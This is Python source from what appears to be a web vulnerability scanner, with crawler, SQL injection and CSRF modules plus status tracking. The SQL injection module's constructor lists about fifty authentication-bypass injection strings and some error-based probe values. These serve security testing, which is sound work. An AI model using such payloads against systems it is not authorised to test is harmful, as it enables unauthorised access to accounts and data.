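    def __init__(self, process, root):
        """Seed the crawl with *root* and mark *process* as crawling.

        Args:
            process: identifier of the search process this crawl belongs to.
            root: the starting URL; it is queued for crawling and is also the
                first entry of the final URL list.
        """
        self.queue = URLlist()
        self.queue.put_url(root)
        self.final_list = URLlist()
        self.final_list.put_url(root)

        db = DBAdapter()
        try:
            db.update_process(process, 2)  # Status: 2, crawling.
        finally:
            # Close even when the update raises so the connection is not leaked.
            db.close_connection()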
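    def start(self, call):
        """Dispatch an API call: run a search (1) or report the current status (2).

        Args:
            call: the raw API call; ``__check_call`` maps it to an option number.

        Returns:
            ``{"response": False}`` when the call is unknown, when the user
            already has a search running, or when there is no process to
            report; a dict with ``web``/``date``/``stype``/``status`` for a
            status query; ``True`` otherwise.

        NOTE(review): as in the original flow, an invalid URL skips the search
        entirely but still returns ``True`` — callers cannot tell that apart
        from a completed search; confirm this is intended.
        """
        c = self.__check_call(call)
        if c == 1:  # Search option.
            if self.__is_valid_url():
                self.__check_modules()
                url_list = URLlist()

                db = DBAdapter()
                try:
                    process = db.new_process(self.url, self.user, 1,
                                             1)  # Status: 1, processing.
                finally:
                    db.close_connection()

                if process == 0:  # The user has a search going on.
                    return {"response": False}

                url_list.put_url(self.url)

                # Going through the required modules by the API.
                for action in self.actions:
                    if not action['module']:  # The module is not active.
                        continue
                    number = action['number']
                    if number == 1:
                        # The crawler replaces the seed list with what it found.
                        from backend.modules.crawler.module import main as crawler_main
                        url_list = crawler_main(process, self.url)
                    elif number == 2:
                        from backend.modules.sqlinjection.module import main as sqli_main
                        sqli_main(url_list, process, self.user)
                    elif number == 3:
                        from backend.modules.csrf.module import main as csrf_main
                        csrf_main(url_list, process, self.user)
                    # Any other module number is ignored.

                # NOTE(review): if a module raises, the status is never set to 5
                # and the process stays at its last intermediate status — verify
                # that the status query / new_process handle that case.
                db = DBAdapter()
                try:
                    db.update_process(process, 5)  # Status: 5, finished.
                finally:
                    db.close_connection()
        elif c == 2:  # Get status option.
            db = DBAdapter()
            try:
                process = db.get_current_process_status(self.user)
            finally:
                db.close_connection()

            if process is None:
                return {"response": False}
            # Row layout (stype, web, date, status) is inferred from the
            # indices used here — confirm against DBAdapter.
            return {
                "web": process[1],
                "date": process[2],
                "stype": process[0],
                "status": process[3]
            }
        else:  # Wrong call.
            return {"response": False}

        return True  # If we get here, everything was right.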
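    def __init__(self, url_list, process, user):
        """Prepare a CSRF search over *url_list* and mark *process* as status 4.

        Args:
            url_list: URLs to test; ``None`` means start from an empty URLlist
                (e.g. the crawler module was not run).
            process: identifier of the owning search process.
            user: the user the search belongs to.
        """
        self.process = process
        self.user = user
        self.url_list = URLlist() if url_list is None else url_list

        db = DBAdapter()
        try:
            db.update_process(process, 4)  # Status: 4, csrf search.
        finally:
            # Close even when the update raises so the connection is not leaked.
            db.close_connection()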
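    def __init__(self, url_list, process, user):
        """Prepare an SQL injection search over *url_list* and mark *process* as status 3.

        Args:
            url_list: URLs to test; ``None`` means start from an empty URLlist
                (e.g. the crawler module was not run).
            process: identifier of the owning search process.
            user: the user the search belongs to.
        """
        self.process = process
        self.user = user
        self.url_list = URLlist() if url_list is None else url_list

        db = DBAdapter()
        try:
            db.update_process(process, 3)  # Status: 3, SQL injection search.
        finally:
            # Close even when the update raises so the connection is not leaked.
            db.close_connection()

        # Authentication-bypass test inputs, taken from:
        # http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
        self.input_data = [
            'admin\'--', '\' or 1=1', ' or 1=1', 'or 1=1--', 'or 1=1#',
            'or 1=1/*', 'admin\' #', 'admin\'/*', 'admin\' or \'1\'=\'1',
            'admin\' or \'1\'=\'1\'--', 'admin\' or \'1\'=\'1\'#',
            'admin\' or \'1\'=\'1\'/*', 'admin\'or 1=1 or \'\'=\'',
            'admin\' or 1=1', 'admin\' or 1=1--', 'admin\' or 1=1#',
            'admin\' or 1=1/*', 'admin\') or (\'1\'=\'1',
            'admin\') or (\'1\'=\'1\'--', 'admin\') or (\'1\'=\'1\'#',
            'admin\') or (\'1\'=\'1\'/*', 'admin\') or \'1\'=\'1',
            'admin\') or \'1\'=\'1\'--', 'admin\') or \'1\'=\'1\'#',
            'admin\') or \'1\'=\'1\'/*', 'admin" --', 'admin" #', 'admin"/*',
            'admin" or "1"="1', 'admin" or "1"="1"--', 'admin" or "1"="1"#',
            'admin" or "1"="1"/*', 'admin"or 1=1 or ""="', 'admin" or 1=1',
            'admin" or 1=1--', 'admin" or 1=1#', 'admin" or 1=1/*',
            'admin") or ("1"="1', 'admin") or ("1"="1"--',
            'admin") or ("1"="1"#', 'admin") or ("1"="1"/*',
            'admin") or "1"="1', 'admin") or "1"="1"--', 'admin") or "1"="1"#',
            'admin") or "1"="1"/*'
        ]

        # Parameter values for the error-based check: a bare quote plus a
        # true/false pair whose responses are expected to differ.
        self.error_based_sqli_param_data = [
            '\'', 'A%\' and 1=1--', 'A%\' and 1=2--'
        ]

        # Error signatures per DBMS, from
        # https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
        # They are lowercase, so the comparison code presumably lowercases the
        # response before matching — TODO confirm.
        self.sql_errors = {
            'MySQL': 'you have an error in your sql syntax',
            'MSSQL': 'microsoft sql native client error',
            'Oracle': 'ora-00933: sql command not properly ended',
            'PostgreSQL': 'query failed: error: syntax error at or near'
        }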